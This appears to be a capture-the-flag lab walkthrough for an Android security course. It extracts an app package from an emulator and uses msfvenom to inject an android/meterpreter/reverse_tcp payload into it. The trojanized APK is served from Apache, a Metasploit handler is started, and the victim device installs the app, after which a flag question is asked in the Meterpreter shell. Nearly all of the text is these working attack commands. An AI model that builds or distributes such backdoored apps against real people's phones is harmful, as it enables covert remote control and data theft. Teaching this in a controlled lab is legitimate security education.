Open Settings. Click "Apps & notifiations", "App info", Firefox.
Scroll down and allow "Install unknown apps", as shown below.
I will use USA Today for the instructions below. If you are using a different app you'll have to adjust the commands to refer to the correct app name.
You can also use my archived copy of the apps:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the
"List of devices attached",
as shown below.
On Kali, execute these commands:
sudo apt purge apktool -y
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.5.0.jar
mv apktool_2.5.0.jar apktool.jar
sudo mv apktool.jar /usr/bin
sudo mv apktool /usr/bin
sudo chmod +x /usr/bin/apktool*
apktool
You should see the "Apktool v2.5.0" help
message,
as shown below.
The commands may need some adjustment to work on your system. You need the output of each command to know what to put in the next one.
adb shell pm list packages | grep what
adb shell pm path com.whatsapp
adb pull /data/app/com.whatsapp-4ecBR8w_r7bateDGMM9YPg==/base.apk
The app should download,
as shown below.
msfvenom -l payloads | grep android
There are only a few payloads available,
as shown below.
On Kali, execute this command to find your IP address.
ifconfig
When I did it, the address was 172.16.123.180,
as shown below.
On Kali, execute this command to generate the malware, replacing the IP address with your Kali systems IP address:
msfvenom -x base.apk -p android/meterpreter/reverse_tcp LHOST=172.16.123.180 -f raw -o usapwned.apk
The malware is generated,
as shown below.
On Kali, execute these commands to start a Web server and host your malicious app:
service apache2 start
sudo cp usapwned.apk /var/www/html
msfconsole -q
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit begins listening on port 4444,
as shown below.
Click UNINSTALL. Click OK.
Add the APK filename to the end of the IP address, as shown below. Your IP address will be different.
172.16.123.180/usapwned.apk
If a box pops up asking to
"Allow Firefox to access photos, media...",
click ALLOW.
Click Download.
Click Open.
Install the app. Open the app.
Flag M 411.1: Working Directory (15 pts)
In the meterpreter shell, execute this command:The flag is the word covered by a green rectangle in the image below.
pwd